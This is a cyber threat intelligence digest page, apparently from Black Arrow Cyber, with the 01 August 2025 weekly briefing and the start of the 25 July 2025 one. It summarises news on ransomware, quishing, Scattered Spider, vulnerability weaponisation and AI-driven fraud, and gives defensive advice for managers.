Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online
CISOs say they're prepared, their data says otherwise - Help Net Security
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek
China’s botched Great Firewall upgrade invites attacks • The Register
Cybersecurity Incident Response Needs A War Room, Not A Playbook
Yes, you need a firewall on Linux - here's why and which to use | ZDNET
Reports Published in the Last Week
Other News
Man-in-the-Middle Attack Prevention Guide
MacOS Under Attack: How Organizations Can Counter Rising Threats
Strengthening the UK's data center infrastructure | TechRadar
Councils are the weak link in UK cyber defences
Cyberattacks Making Consumers More Cautious About Online Shopping
Energy companies are blind to thousands of exposed services - Help Net Security
UK Boosts Cybersecurity Budget to Shield Critical Infrastructure
UK Ministry of Defence to bolster troops’ cyber skills | Cybernews
Monaco fights back after cybercriminals target national icons - NEWS.MC - Monaco News
Why blow up satellites when you can just hack them? • The Register
Vulnerability Management
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
The Critical Flaw in CVE Scoring
Exposed Without a Breach: The Cost of Data Blindness
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
AI Beats Hackers to a Zero-Day Cybersecurity Discovery, Twice
Microsoft’s Update Mistake—45% Of All Windows Users Now At Risk
US Agencies Fail IT Security Audits, Jeopardizing National Security
Vulnerabilities
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk - Infosecurity Magazine
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Google fixed two Qualcomm bugs that were actively exploited in the wild
Android's August 2025 Update Patches Exploited Qualcomm Vulnerability - SecurityWeek
Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities - SecurityWeek
Google addresses six vulnerabilities in August’s Android security update | CyberScoop
CISA releases malware analysis for Sharepoint Server attack • The Register
Ransomware gangs join attacks targeting Microsoft SharePoint servers
Apple iOS 18.6 Update Patches 29 Security Flaws, Fixes Exploited WebKit Bug
Adobe issues emergency fixes for AEM Forms zero-days after PoCs released
Millions of Dell PCs with Broadcom chips open to attack • The Register
New Ghost Calls tactic abuses Zoom and Microsoft Teams for C2 operations
RCE Flaw in AI Coding Tool Poses Software Supply Chain Risk
Vibe coding tool Cursor allows persistent code execution • The Register
Trend Micro fixes two actively exploited Apex One RCE flaws
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Proton fixes Authenticator bug leaking TOTP secrets in logs
Critical Vulnerabilities Found in NVIDIA's Triton Inference Server - Infosecurity Magazine
Adobe Issues Out-of-Band Patches for AEM Forms Vulnerabilities With Public PoC - SecurityWeek
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
China: US spies used Microsoft Exchange 0-day to steal info • The Register
Nvidia Patches Critical RCE Vulnerability Chain
CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can to keep yourself and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are provided for interest and awareness. Linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 01 August 2025
Black Arrow Cyber Threat Intelligence Briefing 01 August 2025:
- HR Documents Appear in 82% of All Data Breaches
- Scattered Spider Ransomware Group Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees
- Gen Z Falls for Scams 2x More Than Older Generations
- Millions Hit in Quishing Attacks as Malicious QR Codes Surge
- Ransomware Attacks Escalate to Physical Threats Against Executives
- Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies
- New Chaos Ransomware Emerges, Launches Wave of Attacks
- Seychelles Commercial Bank Reported Cyber Security Incident
- Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure
- Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else
- Getting a Cyber Security Vibe Check on Vibe Coding
- The Growing Impact of AI and Quantum on Cyber Security
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Executive Summary
Our review of specialist and general media continues to show that cyber security relies on, and affects, people, especially employees. Groups such as Scattered Spider exploit workplace platforms like Teams to deceive employees, and Gen Z are twice as likely to fall for attacks. QR code-based scams (Quishing) are also increasing, and research shows over 80% of data breaches involve HR documents.
Ransomware remains a serious threat, often enabled by employee actions or insecure systems. Around 40% of incidents include threats of physical harm, and a new ransomware group is targeting multiple countries using techniques including voice phishing. Other attacks continue to cause disruption; for example, Seychelles Commercial Bank suspended internet banking following a cyber incident that led to leaked data.
Technology remains essential. A report highlights the importance of keeping systems updated and maintaining strong detection and response capabilities. Many exploited vulnerabilities are old, yet a third are exploited within a day of disclosure. Looking ahead, AI and quantum computing present emerging risks that must be addressed now.
Our guidance remains unchanged. Awareness and strong controls across people, operations and technology are essential. Employees must be recognised as central to both your cyber risk and resilience.
Top Cyber Stories of the Last Week
HR Documents Appear in 82% of All Data Breaches
New research by Lab 1 has found that HR documents are present in 82% of all data breaches, second only to finance. These files often contain personal information such as addresses and employment history, making them attractive to cyber criminals. Such data can be misused to create synthetic identities or convincing phishing attacks. As cyber threats grow more sophisticated, HR teams are urged to treat employee data protection as a shared responsibility alongside IT. One-off training is not enough; building security requires continuous action and closer collaboration between HR and security leaders.
The Scattered Spider Ransomware Group Is Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees
Scattered Spider, a well-known cyber crime group, has escalated its activities by infiltrating workplace platforms such as Slack and Microsoft Teams to target employees. The group uses convincing impersonation tactics, often posing as internal staff to trick IT teams into resetting passwords or bypassing multifactor authentication. It has also joined internal calls to gather intelligence and adapt its methods in real time. UK and US firms have been hit hardest, with sectors from retail to aviation impacted. Authorities urge firms to adopt phishing-resistant authentication, monitor suspicious logins and keep offline backups to reduce exposure to data theft and operational disruption.
Gen Z Falls for Scams 2x More Than Older Generations
Recent studies reveal that Gen Z is twice as likely to fall for online scams compared to older generations, posing a growing cyber security risk to employers. Their high digital fluency often leads to risky behaviours such as password reuse, multitasking across multiple jobs, and using personal devices for work. As they increasingly rely on freelance and remote roles, attackers exploit this blend of work and personal activity through phishing emails and impersonation scams. Poor credential hygiene and unapproved software use further widen the risk to businesses, especially where bring-your-own-device and remote access are common.
https://www.darkreading.com/cyber-risk/gen-z-scams-2x-more-older-generations
Millions Hit in Quishing Attacks as Malicious QR Codes Surge; How to Stay Safe
Quishing, a form of phishing using malicious QR codes, is on the rise, with over 26 million people reportedly directed to fake websites that harvest passwords and payment details or install harmful software. These codes are often placed in public spaces such as posters or parking meters and are difficult to distinguish visually from legitimate ones. A recent study found that over a quarter of all malicious links are now delivered via QR codes, reflecting a shift away from traditional email scams. As QR codes were never designed with security in mind, extra caution is essential when scanning unfamiliar ones.
Ransomware Attacks Escalate to Physical Threats Against Executives
Ransomware attacks are becoming increasingly aggressive, with a recent report from Semperis showing that 40% of incidents now involve threats of physical harm to executives and nearly half involve threats to report the victim to regulators. In the US, 81% of affected firms paid a ransom, over half of those paid more than once, and 15% received no usable decryption key. Victims often face repeated attacks, with 73% suffering multiple incidents. Disruption from ransomware continues to impact operations, causing job losses, data breaches and cancelled insurance. Despite growing resistance to extortion, the majority of targeted organisations still paid, highlighting the need to invest in cyber resilience.
https://www.infosecurity-magazine.com/news/ransomware-attacks-escalate/
Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies
Flashpoint’s midyear report paints a stark picture of the cyber threat landscape in 2025, with ransomware incidents up 179% and credential theft soaring by 800%. The first six months saw 1.8 billion credentials stolen and over 9 billion records exposed, largely due to unauthorised access. Manufacturing, technology and legal sectors were particularly affected. Vulnerability disclosures also rose sharply, with 35% of known flaws already exploited. A significant backlog in vulnerability analysis has left many organisations exposed. The report stresses the need for faster patching and better threat intelligence to help firms stay ahead in a rapidly evolving risk environment.
New Chaos Ransomware Emerges, Launches Wave of Attacks
A new ransomware group known as Chaos has launched a wave of opportunistic cyber attacks, affecting organisations across the US, UK, New Zealand and India. First emerging in early 2025, Chaos employs a combination of voice phishing, remote access tools and file encryption to extract data and demand ransoms, typically in the hundreds of thousands of dollars. The group’s tactics include offering 'incentives' for payment and threatening further disruption such as denial-of-service attacks if demands are refused. Researchers believe the gang may have ties to previous threat actors, citing similarities in methods and communication style.
https://www.infosecurity-magazine.com/news/chaos-ransomware-wave-attacks/
Seychelles Commercial Bank Reported Cyber Security Incident
Seychelles Commercial Bank has confirmed a recent cyber security incident that led to a temporary suspension of internet banking services. Although no financial losses were reported, personal data of online banking customers was exposed, including names, contact details, account types and balances. External researchers who analysed the leaked data noted that some affected accounts were labelled as government-related. The bank has advised customers to use ATMs or visit branches while services are restored. The incident has been formally acknowledged by the Central Bank of Seychelles and may draw wider attention due to the country’s role in offshore financial services.
Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure
VulnCheck’s latest data shows that nearly a third of known exploited software vulnerabilities in 2025 were weaponised within 24 hours of disclosure, up from around a quarter in 2024. Microsoft and Cisco were the most targeted vendors, with content management systems, network devices and server software making up the bulk of affected categories. Russian and Iranian threat actors significantly increased their activity, while Chinese and North Korean groups saw declines. Of the 181 unique vulnerabilities used by recognised threat actors, most had already been exploited before 2025, reinforcing the need for prompt patching and ongoing vigilance.
https://www.infosecurity-magazine.com/news/third-kev-exploited/
Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else
OpenAI’s CEO has warned of an imminent fraud crisis driven by artificial intelligence, where scammers will be able to convincingly mimic voices and even video likenesses to impersonate individuals. Speaking to the US Federal Reserve, he raised concerns about financial institutions still relying on voice authentication, which AI tools can now easily defeat. Real-world cases already show AI being used to trick employees and impersonate officials. While OpenAI claims it is not developing impersonation tools, Altman cautioned that others will, and that organisations must urgently update their authentication methods to avoid being exposed to this growing threat.
https://futurism.com/sam-altman-ai-fraud-crisis-imitate
Getting a Cyber Security Vibe Check on Vibe Coding
Vibe coding, where natural language prompts are used to generate code via AI, is gaining traction but poses clear security risks. A recent study found AI tools made insecure coding choices nearly half the time, with Java faring worst at a 71% failure rate. Common issues include outdated software components, flawed access controls, and unpredictable behaviours like data exposure or deletion. Experts stress that while AI coding tools may speed up prototyping, they remain immature for secure production use. Human code review, vulnerability scanning, and clear development guardrails remain essential to safely benefit from this fast-evolving technology.
https://www.darkreading.com/application-security/cybersecurity-vibe-check-vibe-coding
The Growing Impact of AI and Quantum on Cyber Security
Artificial intelligence and quantum computing are reshaping the digital landscape, offering major efficiency gains but introducing serious cyber security risks. AI-driven cyber attacks are becoming more frequent and harder to detect, with one in four CISOs reporting AI-based threats in the past year. At the same time, quantum computing threatens to undermine current encryption standards, raising urgent concerns about future data protection. Despite these risks, few organisations have a clear plan to adapt. To stay resilient, firms must invest in proactive cyber security, improve workforce skills, and prepare for a post-quantum future before today’s safeguards become obsolete.
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online
After BlackSuit is taken down, new ransomware group Chaos emerges - Ars Technica
New Chaos Ransomware Emerges, Launches Wave of Attacks - Infosecurity Magazine
Ransomware will thrive until we change our strategy - Help Net Security
Ransomware is on the rise, thanks in part to GenAI - Verdict
Ransomware Attacks Escalate to Physical Threats Against Executives - Infosecurity Magazine
'I am afraid of what's next,' ex-ransomware negotiator says • The Register
Scattered Spider is running a VMware ESXi hacking spree
Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure
The State of Ransomware – Q2 2025 - Check Point Research
Qilin Ransomware Gain Traction Following Legal Assistance Option for Ransomware Affiliates
Ransomware Payment Bans: Prevention Strategy or Misguided Policy? - IT Security Guru
New UK ransomware rules could affect payments firms
Ransomware upstart Gunra goes cross-platform with encryption upgrades | CSO Online
Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine
Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times
Ransomware attacks in education jump 23% year over year | Higher Ed Dive
Ransomware ban won't save councils or NHS without urgent cyber investment
FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant
Ransomware Victims
NHS provider nears collapse a year after cyberattack • The Register
NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek
SafePay ransomware threatens to leak 3.5TB of Ingram Micro data
Why is the National Guard deployed for Minnesota cyberattack? | Stars and Stripes
RTÉ investigating potential cyber security incident – The Irish Times
Minnesota activates National Guard after St. Paul cyberattack
Phishing & Email Based Attacks
Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide
Attackers Exploit M365 for Internal Phishing | Proofpoint US
Gen Z Falls for Scams 2x More Than Older Generations
Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Cyber attacks target email accounts of senior journalists - Press Gazette
Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses
How attackers are still phishing "phishing-resistant" authentication
2025 Email Threats: AI Phishing Demands Multi-Layered Defences
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses
Other Social Engineering
Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide
Gen Z Falls for Scams 2x More Than Older Generations
Inside a Real Clickfix Attack: How This Social Engineering Hack Unfolds
QR Code Quishing Scams Surge 50%: Tips to Protect Your Data
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Top spy laments LinkedIn profiles that reveal defence work • The Register
Fraud, Scams and Financial Crime
Gen Z Falls for Scams 2x More Than Older Generations
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET
11,500 UK companies struck off Companies House register after crackdown - National Crime Agency
Scammers Now Using Google Forms To Hunt Crypto Victims
Who’s Really Behind the Mask? Combatting Identity Fraud - SecurityWeek
Even Scammers Are Turning To AI To Negotiate With Victims
Thai-Cambodian conflict partly provoked by cyber-scams • The Register
Pew: Three quarters of Americans targeted weekly in online scams - UPI.com
Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News
Artificial Intelligence
Ransomware is on the rise, thanks in part to GenAI - Verdict
Getting a Cyber Security Vibe Check on Vibe Coding
Even Scammers Are Turning To AI To Negotiate With Victims
Overcoming Risks from Chinese GenAI Tool Usage
From Ex Machina to Exfiltration: When AI Gets Too Curious - SecurityWeek
AI is here, security still isn’t - Help Net Security
Azure AI Speech needs seconds of audio to clone voices • The Register
The Growing Impact Of AI And Quantum On Cyber Security
Microsoft Copilot Rooted to Gain Unauthorized Root Access to its Backend System
Microsoft wants you to chat with its browser now - but can you trust this Copilot? | ZDNET
Browser Extensions Pose Serious Threat to Gen-AI Tools Handling Sensitive Data - SecurityWeek
Not just YouTube: Google is using AI to guess your age based on your activity - everywhere | ZDNET
AI-Generated Linux Miner 'Koske' Beats Human Malware
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
British 999 caller's voice cloned by Russian network using AI - BBC News
2FA/MFA
Malware
Sophisticated Shuyal Stealer Targets 19 Browsers
AI-Generated Linux Miner 'Koske' Beats Human Malware
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Russian Intelligence blamed for malware tool
Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine
Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek
Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Hackers Breach Toptal GitHub, Publish 10 Malicious npm Packages With 5,000 Downloads
Do Macs Get Viruses? How to Scan for a Mac Virus - CNET
Bots/Botnets
Secrets are leaking everywhere, and bots are to blame - Help Net Security
Mobile
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials
Android Malware Targets Banking Users Through Discord Channels - Infosecurity Magazine
Denial of Service/DoS/DDoS
DDoS-protection crisis looms as attacks grow – Computerworld
Internet of Things – IoT
Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access
Data Breaches/Leaks
Allianz Life: Insurance giant says most US customer data stolen in cyber-attack - BBC News
Seychelles Commercial Bank Reported Cybersecurity Incident
HR documents appear in 82% of all data breaches, finds Lab 1 | UNLEASH
French telecom giant Orange discloses cyber attack
IR35 advisor Qdos confirms a data leak to techie clients • The Register
French defence firm Naval Group investigates cyber leak
How Military Devices are Slipping Through the Cracks
Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net
Tea Dating Advice app spills sensitive data • Graham Cluley
NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek
Lovense sex toy app flaw leaks private user email addresses
Organised Crime & Criminal Actors
The Young & the Restless: Cybercriminals Raise Concerns
Thai-Cambodian conflict partly provoked by cyber-scams • The Register
Hackers plant 4G Raspberry Pi on bank network in failed ATM heist
US Now Top Target for Dark Web Cyberthreats
A US cybercrime group is targeting banks and credit unions | American Banker
FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Scammers Now Using Google Forms To Hunt Crypto Victims
AI-Generated Linux Miner 'Koske' Beats Human Malware
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Insider Risk and Insider Threats
What the Coinbase Breach Says About Insider Risk
Insurance
Supply Chain and Third Parties
Your supply chain security strategy might be missing the biggest risk - Help Net Security
Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net
Cloud/SaaS
Attackers Exploit M365 for Internal Phishing | Proofpoint US
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Microsoft exec admits it 'cannot guarantee' data sovereignty • The Register
UK to rein in Microsoft, AWS with 'strategic market status' • The Register
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Microsoft investigates outage affecting Microsoft 365 admin center
Outages
Microsoft investigates outage affecting Microsoft 365 admin center
Global Starlink outage disrupts Ukrainian front lines
Starlink Faces Another Brief Outage | PCMag
Why did the air traffic control outage cause so much havoc? - BBC News
Encryption
The Growing Impact Of AI And Quantum On Cybersecurity
Google says UK government has not demanded an encryption backdoor for its users' data | TechCrunch
A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society
Linux and Open Source
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Passwords, Credential Stuffing & Brute Force Attacks
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online
Why stolen credentials remain cyber criminals’ tool of choice - Help Net Security
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials
Social Media
Top spy laments LinkedIn profiles that reveal defence work • The Register
Malvertising
Regulations, Fines and Legislation
The top 3 cybersecurity risks posed by the Online Safety Act and age verification | Tom's Guide
UK to rein in Microsoft, AWS with 'strategic market status' • The Register
VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide
UK Online Safety Act Triggers 1400% VPN Surge Amid Ban Fears
Internet age verification begins rollout, and it's as bad as you'd expect
A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society
Ransomware ban won't save councils or NHS without urgent cyber investment
UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live
New UK ransomware rules could affect payments firms
A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine
Banning VPNs to protect kids? Good luck with that • The Register
Government layoffs are making us less safe in cyberspace, experts fear - Nextgov/FCW
Models, Frameworks and Standards
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine
Careers, Working in Cyber and Information Security
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
Cyber security professionals facing burnout as threats mount - CIR Magazine
Law Enforcement Action and Take Downs
Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure
Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Top spy laments LinkedIn profiles that reveal defence work • The Register
'Fire Ant' Cyber Spies Compromise Siloed VMware Systems
Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor
Kremlin goons caught abusing local ISPs to spy on diplomats • The Register
Russia's Secret Blizzard APT Gains Embassy Access
Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog
US Army Building Global IT Warfighting Platform To Prepare for Cyber Warfare | AFCEA International
Nation State Actors
Microsoft’s software licensing playbook is a national security risk | CyberScoop
China
Microsoft’s software licensing playbook is a national security risk | CyberScoop
Top spy laments LinkedIn profiles that reveal defence work • The Register
Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments
'Fire Ant' Cyber Spies Compromise Siloed VMware Systems
Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek
Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine
Overcoming Risks from Chinese GenAI Tool Usage
Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets
CISA to Release Salt Typhoon Report on Telecom Security
FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian
Scoop: US intelligence intervened with DOJ to push HPE-Juniper merger
Chinese Researchers Suggest Lasers and Sabotage to Counter Musk’s Starlink Satellites - SecurityWeek
Russia
Top spy laments LinkedIn profiles that reveal defence work • The Register
Kremlin goons caught abusing local ISPs to spy on diplomats • The Register
Russia's Secret Blizzard APT Gains Embassy Access
Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog
Russian Intelligence blamed for malware tool
Global Starlink outage disrupts Ukrainian front lines
British 999 caller's voice cloned by Russian network using AI - BBC News
Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor
Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News
Pro-Ukraine Hacktivists Ground Dozens of Aeroflot Flights - Infosecurity Magazine
Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent
Iran
North Korea
Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times
Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent
Tools and Controls
The top 3 cyber security risks posed by the Online Safety Act and age verification | Tom's Guide
How the Browser Became the Main Cyber Battleground
Microsoft’s software licensing playbook is a national security risk | CyberScoop
VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide
A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine
DDoS-protection crisis looms as attacks grow – Computerworld
Getting a Cyber Security Vibe Check on Vibe Coding
Security pros drowning in threat-intel data • The Register
How to discover and manage shadow APIs | TechTarget
Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live
Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine
Banning VPNs to protect kids? Good luck with that • The Register
Other News
How the Browser Became the Main Cyber Battleground
The food supply chain has a cybersecurity problem - Help Net Security
Minnesota activates National Guard after St. Paul cyberattack
Is retail a sitting duck for cybercriminals? | Retail Week
Intelligence sharing: The boost for businesses | IT Pro
World told cyber threats must be tackled
The legal minefield of hacking back - Help Net Security
The final frontier of cybersecurity is now in space - Help Net Security
Service Levels for MSSPs: Elevating Security-Specific Services | MSSP Alert
Vulnerability Management
Third of Exploited Flaws Weaponized Within a Day of Disclosure - Infosecurity Magazine
Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
Spikes in malicious activity precede new security flaws in 80% of cases
Vulnerabilities
Exploit available for critical Cisco ISE bug exploited in attacks
Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar
Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Scattered Spider is running a VMware ESXi hacking spree
Microsoft: macOS Sploitlight flaw leaks Apple Intelligence data
Apple fixed a zero-day exploited in attacks against Google Chrome users
Google Patches Vulnerability That Let Anyone Hide Search Results
Critical Flaws in WordPress Plugin Leave 10,000 Sites Vulnerable - Infosecurity Magazine
CISA flags PaperCut RCE bug as exploited in attacks, patch now
New Lenovo UEFI firmware updates fix Secure Boot bypass flaws
Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install
Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are provided for interest and awareness only. Linking to or reposting external content does not constitute endorsement of any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 July 2025
Black Arrow Cyber Threat Intelligence Briefing 25 July 2025:
-158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password
-Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit
-US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability
-Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions
-68% of Organisations Experienced Data Leakage from Employee AI Usage
-Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
-Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis
-Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents
-UK Confirms Ransomware Payment Ban for Public Sector and CNI
-University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed
-$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam
-UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of cyber security intelligence from specialist and public media this week starts with details of three recently disclosed attacks, including an attack causing the collapse of a firm that was almost 160 years old. The attacks were attributed to weak passwords and verification controls, and in one case to the exploitation of a vulnerability in on-premises SharePoint. We share details of a warning of increased attacks during the summer travel season, and the high percentage of organisations suffering data leakage when employees use AI tools, often in an unauthorised manner.
We report on a survey that found almost half of IT managed service providers have funds allocated for paying ransoms, while the UK government has banned public sector and critical national infrastructure organisations from paying ransoms. We include reports of increased attacks in the airline sector, and more widely across Europe as a result of the geopolitical landscape. We also include news of successful legal action against cyber attackers including a student who sold phishing kits, and a US citizen who was helping North Koreans to infiltrate organisations as fake IT workers, as well as UK government sanctions against attackers in the Russian military.
Top Cyber Stories of the Last Week
158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password
